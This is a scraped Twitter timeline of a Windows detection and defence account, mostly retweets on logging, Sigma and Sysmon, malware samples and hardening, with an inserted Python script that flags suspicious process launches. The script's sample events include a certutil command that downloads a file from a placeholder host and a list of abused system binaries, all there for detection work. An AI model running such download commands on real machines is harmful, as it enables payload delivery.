Tweets

You have blocked @rimpq

  1. Pinned tweet
    9 Dec 2019

    ⚙️Account Logon Flow / Process () v0.1 📕[PDF]: 🔗[DIRECT]: ...for self-understanding of the logon flow/process in a Windows system. Special thanks to Andrei Miroshnikov💪 "Find Evil – Know Normal"

  2. Retweeted
    2 Feb

    Need a Reference Architecture? Check out this one showing how technology enables this strategy/access model. Slide 14 of CISO Workshop Module 3

  3. Retweeted
    2 Feb
  4. Retweeted
    1 Feb
  5. Retweeted
    31 Jan

    Join me and on Tuesday, February 11th as we unveil 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI. Register for the webinar here (recording available afterwards):

  6. Retweeted
    1 Feb

    Like and ?! Then you’ll love our write up on how to integrate them.

  7. Retweeted
    1 Feb

    Some essential process execution/cmd lines to monitor for initial access/persist. powershell cmd rundll32 control wscript javaw csc regsvr32 reg certutil bitsadmin schtasks wmic eqnedt32 msiexec cmstp mshta hh curl installutil regsvcs/regasm at msbuild sc cscript msxsl runonce

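The watchlist from the tweet above, applied as a triage filter over process-creation events. This is an added example, not the tweet author's code: the JSON event fields (Image, CommandLine, ParentImage) are an assumption modelled on Sysmon Event ID 1 field names, the Office-parent and URL-on-command-line checks are the editor's additions, and the sample events are constructed.

```python
"""Flag process-creation events whose image is on the tweet's watchlist.

Added example. Event format (JSON lines with Image, CommandLine, ParentImage)
is an assumption loosely modelled on Sysmon Event ID 1; events are constructed.
"""
import json
import ntpath

# Watchlist taken from the tweet; "regsvcs/regasm" expanded to two binaries.
WATCHLIST = {
    "powershell", "cmd", "rundll32", "control", "wscript", "javaw", "csc",
    "regsvr32", "reg", "certutil", "bitsadmin", "schtasks", "wmic", "eqnedt32",
    "msiexec", "cmstp", "mshta", "hh", "curl", "installutil", "regsvcs",
    "regasm", "at", "msbuild", "sc", "cscript", "msxsl", "runonce",
}

# Parents that should rarely spawn the watchlisted binaries (editor's assumption).
OFFICE_PARENTS = {"winword", "excel", "powerpnt", "outlook", "eqnedt32"}

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"Image": r"C:\Windows\System32\rundll32.exe",
                "CommandLine": r"rundll32.exe C:\Users\Public\x.dll,Start",
                "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE"}),
    json.dumps({"Image": r"C:\Windows\System32\svchost.exe",
                "CommandLine": "svchost.exe -k netsvcs",
                "ParentImage": r"C:\Windows\System32\services.exe"}),
    json.dumps({"Image": r"C:\Windows\System32\certutil.exe",
                "CommandLine": "certutil -urlcache -split -f http://example.invalid/a.txt a.txt",
                "ParentImage": r"C:\Windows\System32\cmd.exe"}),
    json.dumps({"Image": r"C:\Windows\System32\wbem\WMIC.exe",
                "CommandLine": "wmic process call create calc.exe",
                "ParentImage": r"C:\Windows\explorer.exe"}),
])


def image_name(path):
    """Lower-cased basename without extension: 'C:\\...\\WMIC.exe' -> 'wmic'."""
    base = ntpath.basename(path)
    return ntpath.splitext(base)[0].lower()


def triage(jsonl):
    """Return (image, parent, reasons) for each event that matches the watchlist."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        img = image_name(ev.get("Image", ""))
        parent = image_name(ev.get("ParentImage", ""))
        if img not in WATCHLIST:
            continue
        reasons = ["watchlisted image"]
        if parent in OFFICE_PARENTS:
            reasons.append("spawned by Office")
        if "http" in ev.get("CommandLine", "").lower():
            reasons.append("URL on command line")
        hits.append((img, parent, reasons))
    return hits


if __name__ == "__main__":
    for img, parent, reasons in triage(SAMPLE_EVENTS):
        print(f"{parent} -> {img}: {', '.join(reasons)}")
```

Matching on the image basename rather than the full path is deliberate: several of these binaries live in more than one directory (System32, SysWOW64, wbem). The extra context checks are what turn a noisy "cmd.exe ran" into something an analyst will actually look at.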
  8. Retweeted
    1 Feb
  9. Retweeted
    31 Jan

    Samples are packed with Themida ✉️ ☣️1.exe --> NuclearBot ⚛️ ☣️9.exe --> Infostealer 💰 ☣️4.exe --> downloads tor.exe and 2 AutoIt files (32.exe and 64.exe), possibly a miner (I am still looking into it, process graph below)

  10. Retweeted
    31 Jan

    Yearly reminder that by is awesome sauce 👌

  11. Retweeted

    Cobalt Strike kit for Lateral Movement

  12. Retweeted
    31 Jan

    Was testing out Elastic 7.5.2. Not sure when a change was made to the behavior of fields that consist of arrays of keywords (like process.args)... This change 'breaks' a lot of the anticipated behaviors from previous versions for fields like process.args.

  13. Retweeted
    30 Jan

    I've spent a whole day on Sigma Focus: Facilitate contributions - New Rule Creation Guide - New colorised test output - New test cases - Rule cleanup (title, date, ids) Next step: How-to guide for pull requests

  14. Retweeted
    30 Jan
  15. Retweeted

    Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD

  16. Retweeted
    30 Jan

    In-memory traces of ppldump, exploiting the zam64.sys vulnerable driver to dump LSASS memory, cool stuff. Sysmon will show a generic/noisy call trace so detection chances here are low; if combined with lsass loading dbgcore.dll it may work.

  17. Retweeted
    29 Jan

    Need a SOC Reference Architecture? Check out this one we put together to show how Microsoft technology integrates into a SOC. Slide 73 of Azure Security Compass -

  18. Retweeted
    30 Jan

    A quick post on why you shouldn't use SYSTEM Tokens when you sandbox a process. Part 1 of N (where I haven't decided how big N is).

  19. Retweeted
    29 Jan

    I finally got around to publishing my Sysmon deployment method. Hope people find it useful:

  20. Retweeted
    29 Jan

    AD Privilege Escalation Exploit: The Overlooked ACL

  21. Retweeted

    1. Network segmentation 2. Host-based Firewalls 3. Windows Credential Guard/Exploit Guard 4. Applocker 5. Privilege Account Monitoring 6. EDR 7. Sandboxed Office365/Outlook 8. 2FA 9. AMSI 10. MSBuild/Powershell Monitoring
